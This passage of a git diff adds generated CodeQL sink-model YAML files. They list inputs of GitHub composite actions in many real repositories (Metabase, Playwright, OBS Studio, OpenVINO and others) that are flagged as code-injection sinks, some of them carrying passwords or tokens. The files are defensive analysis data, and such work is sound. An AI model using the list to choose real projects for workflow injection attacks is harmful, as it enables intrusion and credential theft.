"generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 00000000000..5ee6e863db6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 00000000000..3f5a3b658c3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 00000000000..f5c13431126 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 00000000000..4788f44e856 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 00000000000..7c66229c174 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 00000000000..9eb3bdcf5eb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 00000000000..0db95acd5cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 00000000000..785384aa207 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 00000000000..24c4fb4bc70 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 00000000000..72575eb7368 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 00000000000..b2b49fbba09 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 00000000000..6755f0d773c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 00000000000..1b55ab2d549 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 00000000000..84401828721 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..35804a87f05 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 00000000000..981fe0fd348 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 00000000000..6c984a676d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 00000000000..1138d37fb5f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 00000000000..1418299b39a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 00000000000..fb67f66ce62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 00000000000..12aa48431db --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 00000000000..336af4b814b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 00000000000..8d2170c47e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 00000000000..854601e3dde --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 00000000000..8a6074b8796 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 00000000000..f305e2a37b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 00000000000..042ca09efa6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 00000000000..51d4903fbb1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 00000000000..12dc3005260 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 00000000000..dfe3b7f4332 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 00000000000..663fada6df9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 00000000000..4a53345e6e5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 00000000000..0a18189242d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 00000000000..93ec3ea468d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 00000000000..27f5af98f89 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 00000000000..125dd8324d2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 00000000000..dfa24454444 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 00000000000..9469e745ffc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 00000000000..6e34a2cf592 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 00000000000..4ea72b28476 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 00000000000..a0b7bca54ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 00000000000..816a18fe73b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 00000000000..bf8cbfc01e0 --- /dev/null +++ 